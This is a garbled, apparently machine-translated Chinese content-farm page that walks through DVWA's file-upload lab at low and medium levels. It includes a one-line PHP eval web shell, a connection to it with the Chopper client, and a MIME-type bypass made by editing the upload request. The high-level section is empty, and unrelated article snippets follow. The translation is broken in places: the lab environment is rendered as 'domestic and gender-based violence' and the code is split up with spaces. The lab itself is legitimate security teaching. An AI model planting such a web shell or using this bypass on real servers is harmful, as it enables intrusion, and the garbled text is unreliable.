大数据中如何进行文件上传漏洞的分析

技术大数据中如何进行文件上传漏洞的分析今天就跟大家聊聊有关大数据中如何进行文件上传漏洞的分析,可能很多人都不太了解,为了让大家更加了解,小编给大家总结了以下内容,希望大家根据这篇文章可以有所收获。一、环境:dvwa二、选

今天跟大家聊聊大数据中的文件上传漏洞如何分析,可能很多人都不太懂。为了让大家更好的了解,边肖为大家总结了以下内容,希望大家能从这篇文章中有所收获。

一.环境:家庭暴力和基于性别的暴力

第二,选择上传,低级。

1.上传1.php文件和1.jpg文件没有问题。

PHP文件的内容是:

?PHP @ eval($ _ POST[' ABC ']);

大数据中如何进行文件上传漏洞的分析

大数据中如何进行文件上传漏洞的分析

2.访问我们上传的文件

http://192 . 168 . 152 . 188/dvwa/hackable/uploads/1 . jpg

你可以看到图片。

http://192 . 168 . 152 . 188/dvwa/hackable/uploads/1 . PHP

我什么都看不见。

3.用菜刀链接1.php文件,然后单击添加。

大数据中如何进行文件上传漏洞的分析

大数据中如何进行文件上传漏洞的分析

4.双击链接进入

大数据中如何进行文件上传漏洞的分析

第三,选择上传,中等水平。

1.上传2.php文件和2.jpg文件,发现2.php无法上传。

2.单击查看来源。

大数据中如何进行文件上传漏洞的分析

3.这里限制了上传类型,可以通过抓取包来修改上传类型。

大数据中如何进行文件上传漏洞的分析

4.我们将文本/纯文本更改为图像/jpeg,并成功上传。

大数据中如何进行文件上传漏洞的分析

5.把它和菜刀联系起来。

大数据中如何进行文件上传漏洞的分析

第四,选择上传,高水平。

看完以上内容,你对如何分析大数据中的文件上传漏洞有了更深入的了解吗?如果您想了解更多知识或相关内容,请关注行业资讯频道,感谢您的支持。

内容来源网络,如有侵权,联系删除,本文地址:https://www.230890.com/zhan/141267.html

(0)

相关推荐

  • 三点水加心,三点水加个心是什么意思

    技术三点水加心,三点水加个心是什么意思沁读音三点水加心:qin基本字义:1. 渗入;浸润:~润。~人心脾。~凉。
    2. 汲水:“义泉虽至近,盗索不敢~”;
    3. 头向下垂:~着头;
    4. 纳入水中。常用组词:沁凉 qìn

    生活 2021年10月24日
  • 大数据处理涉及的数据类型(数据库实时查询大数据)

    技术数据库中如何操作大数据集这篇文章给大家分享的是有关数据库中如何操作大数据集的内容。小编觉得挺实用的,因此分享给大家做个参考,一起跟随小编过来看看吧。一、子查询插入数据1、语法INSERT INTO table [ c

    攻略 2021年12月13日
  • 支付宝转账记录怎么查,支付宝转账记录怎么查

    技术支付宝转账记录怎么查,支付宝转账记录怎么查支付宝转账记录怎么查?现在我们很多时候都会使用支付宝的转账功能。不过有的时候我们会忘记转账给谁了转账了多少钱,那么支付宝转账记录怎么查看呢?支付宝转账记录又在哪查看呢?现在就

    生活 2021年10月28日
  • 租用香港服务器的优点香港服务器

    技术租用香港服务器的优点香港服务器对于一些网站所有者来说,虽然云服务器和VPS能够提供更为廉价的租用方案但是如果要求性能和数据的私密性很多用户还是会选择将网站或者数据部署在物理服务器上。以很多海外站长最经常使用的香港服务

    礼包 2021年10月22日
  • Sql Server中存储过程中输入和输出参数是什么

    技术Sql Server中存储过程中输入和输出参数是什么本篇文章为大家展示了Sql Server中存储过程中输入和输出参数是什么,内容简明扼要并且容易理解,绝对能使你眼前一亮,通过这篇文章的详细介绍希望你能有所收获。[s

    攻略 2021年12月1日
  • 调试kubernetes最简单方法(kubernetes容器设计模式概述)

    技术如何进行kubernetes scheduler backend调度的实现本篇文章为大家展示了如何进行kubernetes scheduler backend调度的实现,内容简明扼要并且容易理解,绝对能使你眼前一亮,

    攻略 2021年12月15日